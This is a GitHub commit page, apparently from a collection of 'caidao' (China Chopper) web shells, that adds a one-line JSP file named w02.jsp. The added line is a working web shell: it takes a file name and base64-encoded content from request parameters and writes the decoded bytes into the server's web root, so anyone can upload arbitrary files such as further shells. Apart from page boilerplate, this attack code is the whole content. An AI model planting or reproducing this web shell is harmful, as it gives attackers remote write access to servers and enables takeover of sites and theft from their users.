We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 69249a2 commit 4db274eCopy full SHA for 4db274e
caidao-shell/w02.jsp
@@ -0,0 +1 @@
1
+<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();%>
0 commit comments